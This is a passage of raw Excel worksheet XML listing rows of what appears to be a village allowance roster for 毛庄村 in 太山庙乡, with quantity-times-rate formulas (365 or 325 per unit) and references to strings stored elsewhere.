      <c r="K2046" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2047" customHeight="1" spans="1:11">
      <c r="A2047" s="16" t="s">
        <v>5432</v>
      </c>
      <c r="B2047" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2047" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2047" s="17" t="s">
        <v>5433</v>
      </c>
      <c r="E2047" s="17" t="s">
        <v>5401</v>
      </c>
      <c r="F2047" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2047" s="17">
        <v>1</v>
      </c>
      <c r="H2047" s="18">
        <v>365</v>
      </c>
      <c r="I2047" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2047" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2047" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2048" customHeight="1" spans="1:11">
      <c r="A2048" s="16" t="s">
        <v>5434</v>
      </c>
      <c r="B2048" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2048" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2048" s="17" t="s">
        <v>5435</v>
      </c>
      <c r="E2048" s="17" t="s">
        <v>5436</v>
      </c>
      <c r="F2048" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2048" s="17">
        <v>1</v>
      </c>
      <c r="H2048" s="18">
        <v>365</v>
      </c>
      <c r="I2048" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2048" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2048" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2049" customHeight="1" spans="1:11">
      <c r="A2049" s="16" t="s">
        <v>5437</v>
      </c>
      <c r="B2049" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2049" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2049" s="17" t="s">
        <v>5438</v>
      </c>
      <c r="E2049" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2049" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2049" s="17">
        <v>1</v>
      </c>
      <c r="H2049" s="18">
        <v>365</v>
      </c>
      <c r="I2049" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2049" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2049" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2050" customHeight="1" spans="1:11">
      <c r="A2050" s="16" t="s">
        <v>5439</v>
      </c>
      <c r="B2050" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2050" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2050" s="17" t="s">
        <v>5440</v>
      </c>
      <c r="E2050" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2050" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2050" s="17">
        <v>1</v>
      </c>
      <c r="H2050" s="18">
        <v>365</v>
      </c>
      <c r="I2050" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2050" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2050" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2051" customHeight="1" spans="1:11">
      <c r="A2051" s="16" t="s">
        <v>5441</v>
      </c>
      <c r="B2051" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2051" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2051" s="17" t="s">
        <v>5442</v>
      </c>
      <c r="E2051" s="17" t="s">
        <v>5443</v>
      </c>
      <c r="F2051" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2051" s="17">
        <v>1</v>
      </c>
      <c r="H2051" s="18">
        <v>365</v>
      </c>
      <c r="I2051" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2051" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2051" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2052" customHeight="1" spans="1:11">
      <c r="A2052" s="16" t="s">
        <v>5444</v>
      </c>
      <c r="B2052" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2052" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2052" s="17" t="s">
        <v>5445</v>
      </c>
      <c r="E2052" s="17" t="s">
        <v>5446</v>
      </c>
      <c r="F2052" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2052" s="17">
        <v>1</v>
      </c>
      <c r="H2052" s="18">
        <v>365</v>
      </c>
      <c r="I2052" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2052" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2052" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2053" customHeight="1" spans="1:11">
      <c r="A2053" s="16" t="s">
        <v>5447</v>
      </c>
      <c r="B2053" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2053" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2053" s="17" t="s">
        <v>5448</v>
      </c>
      <c r="E2053" s="17" t="s">
        <v>5449</v>
      </c>
      <c r="F2053" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2053" s="17">
        <v>2</v>
      </c>
      <c r="H2053" s="18">
        <v>325</v>
      </c>
      <c r="I2053" s="17">
        <f t="shared" si="102"/>
        <v>650</v>
      </c>
      <c r="J2053" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2053" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2054" customHeight="1" spans="1:11">
      <c r="A2054" s="16" t="s">
        <v>5450</v>
      </c>
      <c r="B2054" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2054" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2054" s="17" t="s">
        <v>5451</v>
      </c>
      <c r="E2054" s="17" t="s">
        <v>5452</v>
      </c>
      <c r="F2054" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2054" s="17"/>
      <c r="I2054" s="17"/>
      <c r="J2054" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2054" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2055" customHeight="1" spans="1:11">
      <c r="A2055" s="16" t="s">
        <v>5453</v>
      </c>
      <c r="B2055" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2055" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2055" s="17" t="s">
        <v>5454</v>
      </c>
      <c r="E2055" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2055" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2055" s="17">
        <v>1</v>
      </c>
      <c r="H2055" s="18">
        <v>365</v>
      </c>
      <c r="I2055" s="17">
        <f>H2055*G2055</f>
        <v>365</v>
      </c>
      <c r="J2055" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2055" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2056" customHeight="1" spans="1:11">
      <c r="A2056" s="16" t="s">
        <v>5455</v>
      </c>
      <c r="B2056" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2056" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2056" s="17" t="s">
        <v>5456</v>
      </c>
      <c r="E2056" s="17" t="s">
        <v>5457</v>
      </c>
      <c r="F2056" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2056" s="17">
        <v>2</v>
      </c>
      <c r="H2056" s="18">
        <v>325</v>
      </c>
      <c r="I2056" s="17">
        <f>H2056*G2056</f>
        <v>650</v>
      </c>
      <c r="J2056" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2056" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2057" customHeight="1" spans="1:11">
      <c r="A2057" s="16" t="s">
        <v>5458</v>
      </c>
      <c r="B2057" s="17" t="str">
        <f>B2056</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2057" s="17" t="str">
        <f>C2056</f>
        <v>毛庄村</v>
      </c>
      <c r="D2057" s="16" t="s">
        <v>5459</v>
      </c>
      <c r="E2057" s="16" t="s">
        <v>5460</v>
      </c>
      <c r="F2057" s="17">
        <f>F2056</f>
        <v>4113210704</v>
      </c>
      <c r="G2057" s="17"/>
      <c r="H2057" s="17"/>
      <c r="I2057" s="17"/>
      <c r="J2057" s="17"/>
      <c r="K2057" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2058" customHeight="1" spans="1:11">
      <c r="A2058" s="16" t="s">
        <v>5461</v>
      </c>
      <c r="B2058" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2058" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2058" s="17" t="s">
        <v>5462</v>
      </c>
      <c r="E2058" s="17" t="s">
        <v>2806</v>
      </c>
      <c r="F2058" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2058" s="17">
        <v>2</v>
      </c>
      <c r="H2058" s="18">
        <v>325</v>
      </c>
      <c r="I2058" s="17">
        <f>H2058*G2058</f>
        <v>650</v>
      </c>
      <c r="J2058" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2058" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2059" customHeight="1" spans="1:11">
      <c r="A2059" s="16" t="s">
        <v>5463</v>
      </c>
      <c r="B2059" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2059" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2059" s="17" t="s">
        <v>5464</v>
      </c>
      <c r="E2059" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2059" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2059" s="17"/>
      <c r="I2059" s="17"/>
      <c r="J2059" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2059" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2060" customHeight="1" spans="1:11">
      <c r="A2060" s="16" t="s">
        <v>5466</v>
      </c>
      <c r="B2060" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2060" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2060" s="17" t="s">
        <v>5467</v>
      </c>
      <c r="E2060" s="17" t="s">
        <v>5468</v>
      </c>
      <c r="F2060" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2060" s="17">
        <v>1</v>
      </c>
      <c r="H2060" s="18">
        <v>365</v>
      </c>
      <c r="I2060" s="17">
        <f>H2060*G2060</f>
        <v>365</v>
      </c>
      <c r="J2060" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2060" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2061" customHeight="1" spans="1:11">
      <c r="A2061" s="16" t="s">
        <v>5469</v>
      </c>
      <c r="B2061" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2061" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2061" s="17" t="s">
        <v>5470</v>
      </c>
      <c r="E2061" s="17" t="s">
        <v>5471</v>
      </c>
      <c r="F2061" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2061" s="17">
        <v>2</v>
      </c>
      <c r="H2061" s="18">
        <v>325</v>
      </c>
      <c r="I2061" s="17">
        <f>H2061*G2061</f>
        <v>650</v>
      </c>
      <c r="J2061" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2061" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2062" customHeight="1" spans="1:11">
      <c r="A2062" s="16" t="s">
        <v>5472</v>
      </c>
      <c r="B2062" s="17" t="str">
        <f>B2061</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2062" s="17" t="str">
        <f>C2061</f>
        <v>毛庄村</v>
      </c>
      <c r="D2062" s="16" t="s">
        <v>5473</v>
      </c>
      <c r="E2062" s="16" t="s">
        <v>5465</v>
      </c>
      <c r="F2062" s="17">
        <f>F2061</f>
        <v>4113210704</v>
      </c>
      <c r="G2062" s="17"/>
      <c r="H2062" s="17"/>
      <c r="I2062" s="17"/>
      <c r="J2062" s="17"/>
      <c r="K2062" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2063" customHeight="1" spans="1:11">
      <c r="A2063" s="16" t="s">
        <v>5474</v>
      </c>
      <c r="B2063" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2063" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2063" s="17" t="s">
        <v>5475</v>
      </c>
      <c r="E2063" s="17" t="s">
        <v>5409</v>
      </c>
      <c r="F2063" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2063" s="17">
        <v>2</v>
      </c>
      <c r="H2063" s="18">
        <v>345</v>
      </c>
      <c r="I2063" s="17">
        <f>H2063*G2063</f>
        <v>690</v>
      </c>
      <c r="J2063" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2063" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2064" customHeight="1" spans="1:11">
      <c r="A2064" s="16" t="s">
        <v>5476</v>
      </c>
      <c r="B2064" s="17" t="str">
        <f>B2063</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2064" s="17" t="str">
        <f>C2063</f>
        <v>毛庄村</v>
      </c>
      <c r="D2064" s="16" t="s">
        <v>5477</v>
      </c>
      <c r="E2064" s="16" t="s">
        <v>5478</v>
      </c>
      <c r="F2064" s="17">
        <f>F2063</f>
        <v>4113210704</v>
      </c>
      <c r="G2064" s="17"/>
      <c r="H2064" s="17"/>
      <c r="I2064" s="17"/>
      <c r="J2064" s="17"/>
      <c r="K2064" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2065" customHeight="1" spans="1:11">
      <c r="A2065" s="16" t="s">
        <v>5479</v>
      </c>
      <c r="B2065" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2065" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2065" s="17" t="s">
        <v>5480</v>
      </c>
      <c r="E2065" s="17" t="s">
        <v>5481</v>
      </c>
      <c r="F2065" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2065" s="17">
        <v>2</v>
      </c>
      <c r="H2065" s="18">
        <v>325</v>
      </c>
      <c r="I2065" s="17">
        <f>H2065*G2065</f>
        <v>650</v>
      </c>
      <c r="J2065" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2065" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2066" customHeight="1" spans="1:11">
      <c r="A2066" s="16" t="s">
        <v>5482</v>
      </c>
      <c r="B2066" s="17" t="str">
        <f>B2065</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2066" s="17" t="str">
        <f>C2065</f>
        <v>毛庄村</v>
      </c>
      <c r="D2066" s="16" t="s">
        <v>5483</v>
      </c>
      <c r="E2066" s="16" t="s">
        <v>5484</v>
      </c>
      <c r="F2066" s="17">
        <f>F2065</f>
        <v>4113210704</v>
      </c>
      <c r="G2066" s="17"/>
      <c r="H2066" s="17"/>
      <c r="I2066" s="17"/>
      <c r="J2066" s="17"/>
      <c r="K2066" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2067" customHeight="1" spans="1:11">
      <c r="A2067" s="16" t="s">
        <v>5485</v>
      </c>
      <c r="B2067" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2067" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2067" s="17" t="s">
        <v>5486</v>
      </c>
      <c r="E2067" s="17" t="s">
        <v>5468</v>
      </c>
      <c r="F2067" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2067" s="17">
        <v>1</v>
      </c>
      <c r="H2067" s="18">
        <v>365</v>
      </c>
      <c r="I2067" s="17">
        <f>H2067*G2067</f>
        <v>365</v>
      </c>
      <c r="J2067" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2067" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2068" customHeight="1" spans="1:11">
      <c r="A2068" s="16" t="s">
        <v>5487</v>
      </c>
      <c r="B2068" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2068" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2068" s="17" t="s">
        <v>5488</v>
      </c>
      <c r="E2068" s="17" t="s">
        <v>5449</v>
      </c>
      <c r="F2068" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2068" s="17">
        <v>2</v>
      </c>
      <c r="H2068" s="18">
        <v>325</v>
      </c>
      <c r="I2068" s="17">
        <f>H2068*G2068</f>
        <v>650</v>
      </c>
      <c r="J2068" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2068" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2069" customHeight="1" spans="1:11">
      <c r="A2069" s="16" t="s">
        <v>5489</v>
      </c>
      <c r="B2069" s="17" t="str">
        <f>B2068</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2069" s="17" t="str">
        <f>C2068</f>
        <v>毛庄村</v>
      </c>
      <c r="D2069" s="16" t="s">
        <v>5490</v>
      </c>
      <c r="E2069" s="25" t="s">
        <v>5431</v>
      </c>
      <c r="F2069" s="17">
        <f>F2068</f>
        <v>4113210704</v>
      </c>
      <c r="G2069" s="17"/>
      <c r="H2069" s="17"/>
      <c r="I2069" s="17"/>
      <c r="J2069" s="17"/>
      <c r="K2069" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2070" customHeight="1" spans="1:11">
      <c r="A2070" s="16" t="s">
        <v>5491</v>
      </c>
      <c r="B2070" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2070" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2070" s="17" t="s">
        <v>5492</v>
      </c>
      <c r="E2070" s="17" t="s">
        <v>5493</v>
      </c>
      <c r="F2070" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2070" s="17">
        <v>1</v>
      </c>
      <c r="H2070" s="18">
        <v>365</v>
      </c>
      <c r="I2070" s="17">
        <f>H2070*G2070</f>
        <v>365</v>
      </c>
      <c r="J2070" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2070" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2071" customHeight="1" spans="1:11">
      <c r="A2071" s="16" t="s">
        <v>5494</v>
      </c>
      <c r="B2071" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2071" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2071" s="17" t="s">
        <v>5495</v>
      </c>
      <c r="E2071" s="17" t="s">
        <v>5496</v>
      </c>
      <c r="F2071" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2071" s="17">
        <v>2</v>
      </c>
      <c r="H2071" s="18">
        <v>325</v>
      </c>
      <c r="I2071" s="17">
        <f>H2071*G2071</f>
        <v>650</v>
      </c>
      <c r="J2071" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2071" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2072" customHeight="1" spans="1:11">
      <c r="A2072" s="16" t="s">
        <v>5497</v>
      </c>
      <c r="B2072" s="17" t="str">
        <f>B2071</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2072" s="17" t="str">
        <f>C2071</f>
        <v>毛庄村</v>
      </c>
      <c r="D2072" s="16" t="s">
        <v>5498</v>
      </c>
      <c r="E2072" s="16" t="s">
        <v>5499</v>
      </c>
      <c r="F2072" s="17">
        <f>F2071</f>
        <v>4113210704</v>
      </c>
      <c r="G2072" s="17"/>
      <c r="H2072" s="17"/>
      <c r="I2072" s="17"/>
      <c r="J2072" s="17"/>
      <c r="K2072" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2073" customHeight="1" spans="1:11">
      <c r="A2073" s="16" t="s">
        <v>5500</v>
      </c>
      <c r="B2073" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2073" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2073" s="17" t="s">
        <v>5501</v>
      </c>
      <c r="E2073" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2073" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2073" s="17">
        <v>1</v>
      </c>
      <c r="H2073" s="18">
        <v>365</v>
      </c>
      <c r="I2073" s="17">
        <f>H2073*G2073</f>
        <v>365</v>
      </c>
      <c r="J2073" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2073" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2074" customHeight="1" spans="1:11">
      <c r="A2074" s="16" t="s">
        <v>5502</v>
      </c>
      <c r="B2074" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2074" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2074" s="17" t="s">
        <v>5503</v>
      </c>
      <c r="E2074" s="17" t="s">
        <v>5471</v>
      </c>
      <c r="F2074" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2074" s="17">
        <v>1</v>
      </c>
      <c r="H2074" s="18">
        <v>365</v>
      </c>
      <c r="I2074" s="17">
        <f>H2074*G2074</f>
        <v>365</v>
      </c>
      <c r="J2074" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2074" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2075" customHeight="1" spans="1:11">
      <c r="A2075" s="16" t="s">
        <v>5504</v>
      </c>
      <c r="B2075" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2075" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2075" s="17" t="s">
        <v>5505</v>
      </c>
      <c r="E2075" s="17" t="s">
        <v>5506</v>
      </c>
      <c r="F2075" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2075" s="17">
        <v>2</v>
      </c>
      <c r="H2075" s="18">
        <v>325</v>
      </c>
      <c r="I2075" s="17">
        <f>H2075*G2075</f>
        <v>650</v>
      </c>
      <c r="J2075" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2075" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2076" customHeight="1" spans="1:11">
      <c r="A2076" s="16" t="s">
        <v>5507</v>
      </c>
      <c r="B2076" s="17" t="str">
        <f>B2075</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2076" s="17" t="str">
        <f>C2075</f>
        <v>毛庄村</v>
      </c>
      <c r="D2076" s="16" t="s">
        <v>5508</v>
      </c>
      <c r="E2076" s="16" t="s">
        <v>3527</v>
      </c>
      <c r="F2076" s="17">
        <f>F2075</f>
        <v>4113210704</v>
      </c>
      <c r="G2076" s="17"/>
      <c r="H2076" s="17"/>
      <c r="I2076" s="17"/>
      <c r="J2076" s="17"/>
      <c r="K2076" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2077" customHeight="1" spans="1:11">
      <c r="A2077" s="16" t="s">
        <v>5509</v>
      </c>
      <c r="B2077" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2077" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2077" s="17" t="s">
        <v>5510</v>
      </c>
      <c r="E2077" s="17" t="s">
        <v>5436</v>
      </c>
      <c r="F2077" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2077" s="17">
        <v>1</v>
      </c>
      <c r="H2077" s="18">
        <v>365</v>
      </c>
      <c r="I2077" s="17">
        <f>H2077*G2077</f>
        <v>365</v>
      </c>
      <c r="J2077" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2077" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2078" customHeight="1" spans="1:11">
      <c r="A2078" s="16" t="s">
        <v>5511</v>
      </c>
      <c r="B2078" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2078" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2078" s="17" t="s">
        <v>5512</v>
      </c>
      <c r="E2078" s="17" t="s">
        <v>5513</v>
      </c>
      <c r="F2078" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2078" s="17">
        <v>1</v>
      </c>
      <c r="H2078" s="18">
        <v>365</v>
      </c>
      <c r="I2078" s="17">
        <f>H2078*G2078</f>
        <v>365</v>
      </c>
      <c r="J2078" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2078" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2079" customHeight="1" spans="1:11">
      <c r="A2079" s="16" t="s">
        <v>5514</v>
      </c>
      <c r="B2079" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2079" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2079" s="17" t="s">
        <v>5515</v>
      </c>
      <c r="E2079" s="17" t="s">
        <v>5516</v>
      </c>
      <c r="F2079" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2079" s="17">
        <v>2</v>
      </c>
      <c r="H2079" s="18">
        <v>325</v>
      </c>
      <c r="I2079" s="17">
        <f>H2079*G2079</f>
        <v>650</v>
      </c>
      <c r="J2079" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2079" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2080" customHeight="1" spans="1:11">
      <c r="A2080" s="16" t="s">
        <v>5517</v>
      </c>
      <c r="B2080" s="17" t="str">
        <f>B2079</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2080" s="17" t="str">
        <f>C2079</f>
        <v>毛庄村</v>
      </c>
      <c r="D2080" s="16" t="s">
        <v>5518</v>
      </c>
      <c r="E2080" s="16" t="s">
        <v>5519</v>
      </c>
      <c r="F2080" s="17">
        <f>F2079</f>
        <v>4113210704</v>
      </c>
      <c r="G2080" s="17"/>
      <c r="H2080" s="17"/>
      <c r="I2080" s="17"/>
      <c r="J2080" s="17"/>
      <c r="K2080" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2081" customHeight="1" spans="1:11">
      <c r="A2081" s="16" t="s">
        <v>5520</v>
      </c>
      <c r="B2081" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2081" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2081" s="17" t="s">
        <v>5521</v>
      </c>
      <c r="E2081" s="17" t="s">
        <v>5522</v>
      </c>
      <c r="F2081" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2081" s="17">
        <v>1</v>
      </c>
      <c r="H2081" s="18">
        <v>365</v>
      </c>
      <c r="I2081" s="17">
        <f>H2081*G2081</f>
        <v>365</v>
      </c>
      <c r="J2081" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2081" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2082" customHeight="1" spans="1:11">
      <c r="A2082" s="16" t="s">
        <v>5523</v>
      </c>
      <c r="B2082" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2082" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2082" s="17" t="s">
        <v>5524</v>
      </c>
      <c r="E2082" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2082" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2082" s="17">
        <v>1</v>
      </c>
      <c r="H2082" s="18">
        <v>365</v>
      </c>
      <c r="I2082" s="17">
        <f>H2082*G2082</f>
        <v>365</v>
      </c>
      <c r="J2082" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2082" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2083" customHeight="1" spans="1:11">
      <c r="A2083" s="16" t="s">
        <v>5526</v>
      </c>
      <c r="B2083" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2083" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2083" s="17" t="s">
        <v>5527</v>
      </c>
      <c r="E2083" s="17" t="s">
        <v>5042</v>
      </c>
      <c r="F2083" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2083" s="17">
        <v>1</v>
      </c>
      <c r="H2083" s="18">
        <v>365</v>
      </c>
      <c r="I2083" s="17">
        <f>H2083*G2083</f>
        <v>365</v>
      </c>
      <c r="J2083" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2083" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2084" customHeight="1" spans="1:11">
      <c r="A2084" s="16" t="s">
        <v>5528</v>
      </c>
      <c r="B2084" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2084" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2084" s="17" t="s">
        <v>5529</v>
      </c>
      <c r="E2084" s="17" t="s">
        <v>5417</v>
      </c>
      <c r="F2084" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2084" s="17">
        <v>2</v>
      </c>
      <c r="H2084" s="18">
        <v>325</v>
      </c>
      <c r="I2084" s="17">
        <f>H2084*G2084</f>
        <v>650</v>
      </c>
      <c r="J2084" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2084" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2085" customHeight="1" spans="1:11">
      <c r="A2085" s="16" t="s">
        <v>5530</v>
      </c>
      <c r="B2085" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2085" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2085" s="17" t="s">
        <v>5531</v>
      </c>
      <c r="E2085" s="17" t="s">
        <v>5532</v>
      </c>
      <c r="F2085" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2085" s="17"/>
      <c r="I2085" s="17"/>
      <c r="J2085" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2085" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2086" customHeight="1" spans="1:11">
      <c r="A2086" s="16" t="s">
        <v>5533</v>
      </c>
      <c r="B2086" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2086" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2086" s="17" t="s">
        <v>5534</v>
      </c>
      <c r="E2086" s="17" t="s">
        <v>5446</v>
      </c>
      <c r="F2086" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2086" s="17">
        <v>1</v>
      </c>
      <c r="H2086" s="18">
        <v>365</v>
      </c>
